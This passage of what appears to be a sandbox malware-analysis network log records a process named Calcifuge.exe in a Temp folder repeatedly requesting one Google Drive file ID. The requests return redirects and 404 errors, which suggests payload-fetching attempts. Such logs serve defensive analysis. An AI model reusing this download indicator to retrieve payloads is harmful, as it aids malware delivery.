                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Connection: close


                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                              35 | 192.168.2.4 | 53643 | 172.217.16.129 | 443 | 7824 | C:\Users\user\AppData\Local\Temp\Calcifuge.exe
                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                              2025-01-11 02:53:10 UTC | 470 | OUT | GET /download?id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=download HTTP/1.1
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                              Cache-Control: no-cache
                                                                                              Host: drive.usercontent.google.com
                                                                                              Connection: Keep-Alive
                                                                                              Cookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
                                                                                              2025-01-11 02:53:10 UTC | 1844 | IN | HTTP/1.1 404 Not Found
                                                                                              X-GUploader-UploadID: AFIdbgQKkP60NIDgEohueAlR17uU2GbLtiiBJKRDvV5qwIwsM9oRl6XM4T3mSJZxRl-HFXcN
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Sat, 11 Jan 2025 02:53:10 GMT
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Content-Security-Policy: script-src 'nonce-k_KXH2BzuqMaH0MFO7zbZA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Content-Length: 1652
                                                                                              Server: UploadServer
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                              Connection: close
                                                                                              2025-01-11 02:53:10 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="XgwzD7qGP6_dY_zl0f8CNQ">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                              36 | 192.168.2.4 | 53650 | 172.217.16.206 | 443 | 7824 | C:\Users\user\AppData\Local\Temp\Calcifuge.exe
                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                              2025-01-11 02:53:11 UTC | 428 | OUT | GET /uc?export=download&id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o HTTP/1.1
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                              Host: drive.google.com
                                                                                              Cache-Control: no-cache
                                                                                              Cookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
                                                                                              2025-01-11 02:53:11 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                                                              Content-Type: application/binary
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Sat, 11 Jan 2025 02:53:11 GMT
                                                                                              Location: https://drive.usercontent.google.com/download?id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=download
                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Content-Security-Policy: script-src 'nonce-dNVNZcUVuJJ0pXwAQwdC4w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Server: ESF
                                                                                              Content-Length: 0
                                                                                              X-XSS-Protection: 0
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              X-Content-Type-Options: nosniff
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Connection: close


                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                              37 | 192.168.2.4 | 53659 | 172.217.16.129 | 443 | 7824 | C:\Users\user\AppData\Local\Temp\Calcifuge.exe
                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                              2025-01-11 02:53:12 UTC | 470 | OUT | GET /download?id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=download HTTP/1.1
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                              Cache-Control: no-cache
                                                                                              Host: drive.usercontent.google.com
                                                                                              Connection: Keep-Alive
                                                                                              Cookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
                                                                                              2025-01-11 02:53:12 UTC | 1851 | IN | HTTP/1.1 404 Not Found
                                                                                              X-GUploader-UploadID: AFIdbgSbbiD62kraKvvuu3MZ9Dbq3DnRP836M5H8NBtX54p6Tz7Io9v26iZ0sNLWo0-PT6ebb_G0dBM
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Sat, 11 Jan 2025 02:53:12 GMT
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Content-Security-Policy: script-src 'nonce-r3mSy8_vFSl0NRCkUz1qPA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Content-Length: 1652
                                                                                              Server: UploadServer
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                              Connection: close
                                                                                              2025-01-11 02:53:12 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="AIrP6enAb1F6uc631hJcLA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                              38 | 192.168.2.4 | 53666 | 172.217.16.206 | 443 | 7824 | C:\Users\user\AppData\Local\Temp\Calcifuge.exe
                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                              2025-01-11 02:53:13 UTC | 428 | OUT | GET /uc?export=download&id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o HTTP/1.1
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                              Host: drive.google.com
                                                                                              Cache-Control: no-cache
                                                                                              Cookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
                                                                                              2025-01-11 02:53:14 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                                                              Content-Type: application/binary
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Sat, 11 Jan 2025 02:53:13 GMT
                                                                                              Location: https://drive.usercontent.google.com/download?id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=download
                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Content-Security-Policy: script-src 'nonce-jY8AAR3P2_UHfbYQ4ueANA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Server: ESF
                                                                                              Content-Length: 0
                                                                                              X-XSS-Protection: 0
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              X-Content-Type-Options: nosniff
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Connection: close


                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                              39 | 192.168.2.4 | 53675 | 172.217.16.129 | 443 | 7824 | C:\Users\user\AppData\Local\Temp\Calcifuge.exe
                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                              2025-01-11 02:53:14 UTC | 470 | OUT | GET /download?id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=download HTTP/1.1
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                              Cache-Control: no-cache
                                                                                              Host: drive.usercontent.google.com
                                                                                              Connection: Keep-Alive
                                                                                              Cookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
                                                                                              2025-01-11 02:53:15 UTC | 1851 | IN | HTTP/1.1 404 Not Found
                                                                                              X-GUploader-UploadID: AFIdbgQlQiztYfzb5Cw3AnNZ6vldyE9UFHzFm6rShExmjYQrl_VnCLITv8spmut8F5eiaOyoH5IaI4M
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Sat, 11 Jan 2025 02:53:15 GMT
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Content-Security-Policy: script-src 'nonce-iF-sJ2IIt1uldkia9Ec98w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                              Content-Length: 1652
                                                                                              Server: UploadServer
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                              Connection: close
                                                                                              2025-01-11 02:53:15 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="Rqh4_1yAIEFPL9ySud8QgQ">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                              40 | 192.168.2.4 | 53683 | 172.217.16.206 | 443 | 7824 | C:\Users\user\AppData\Local\Temp\Calcifuge.exe
                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                              2025-01-11 02:53:15 UTC | 428 | OUT | GET /uc?export=download&id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o HTTP/1.1
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                              Host: drive.google.com
                                                                                              Cache-Control: no-cache
                                                                                              Cookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
                                                                                              2025-01-11 02:53:16 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                                                              Content-Type: application/binary
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Sat, 11 Jan 2025 02:53:16 GMT
                                                                                              Location: https://drive.usercontent.google.com/download?id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=download
                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Content-Security-Policy: script-src 'nonce-b5p3NmcUp1xo1x0MLQ_7YQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                              Server: ESF
                                                                                              Content-Length: 0
                                                                                              X-XSS-Protection: 0
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              X-Content-Type-Options: nosniff
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Connection: close


                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                              41 | 192.168.2.4 | 53691 | 172.217.16.129 | 443 | 7824 | C:\Users\user\AppData\Local\Temp\Calcifuge.exe
                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                              2025-01-11 02:53:17 UTC | 470 | OUT | GET /download?id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=download HTTP/1.1
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                              Cache-Control: no-cache
                                                                                              Host: drive.usercontent.google.com
                                                                                              Connection: Keep-Alive
                                                                                              Cookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
                                                                                              2025-01-11 02:53:17 UTC | 1844 | IN | HTTP/1.1 404 Not Found
                                                                                              X-GUploader-UploadID: AFIdbgQ0fDEVSCdESLiu7qFHiMo3Df33jDibUjM32xY8Wnnnrg-1UXbcv04fhgOn-5P3T2XL
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Sat, 11 Jan 2025 02:53:17 GMT
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Content-Security-Policy: script-src 'nonce-6l1rmoCeEBb8h9XUjAIHSg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                              Content-Length: 1652
                                                                                              Server: UploadServer
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                              Connection: close
                                                                                              2025-01-11 02:53:17 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="Du18x4T_xy5Bn1VOUX0ENQ">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                              42 | 192.168.2.4 | 53700 | 172.217.16.206 | 443 | 7824 | C:\Users\user\AppData\Local\Temp\Calcifuge.exe
                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                              2025-01-11 02:53:18 UTC | 428 | OUT | GET /uc?export=download&id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o HTTP/1.1
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                              Host: drive.google.com
                                                                                              Cache-Control: no-cache
                                                                                              Cookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
                                                                                              2025-01-11 02:53:18 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                                                              Content-Type: application/binary
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Sat, 11 Jan 2025 02:53:18 GMT
                                                                                              Location: https://drive.usercontent.google.com/download?id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=download
                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Content-Security-Policy: script-src 'nonce-9RW0RdnROi91CQssVQCdpg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Server: ESF
                                                                                              Content-Length: 0
                                                                                              X-XSS-Protection: 0
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              X-Content-Type-Options: nosniff
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Connection: close


                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                              43 | 192.168.2.4 | 53708 | 172.217.16.129 | 443 | 7824 | C:\Users\user\AppData\Local\Temp\Calcifuge.exe
                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                              2025-01-11 02:53:19 UTC | 470 | OUT | GET /download?id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=download HTTP/1.1
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                              Cache-Control: no-cache
                                                                                              Host: drive.usercontent.google.com
                                                                                              Connection: Keep-Alive
                                                                                              Cookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
                                                                                              2025-01-11 02:53:19 UTC | 1851 | IN | HTTP/1.1 404 Not Found
                                                                                              X-GUploader-UploadID: AFIdbgQ90Klv6Snc7PsAzuRft5W7ZiuF6Ro8kg3evHbdBu0izI0qZK_hT0aapgI6HDAW7u4ISEXVnNE
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
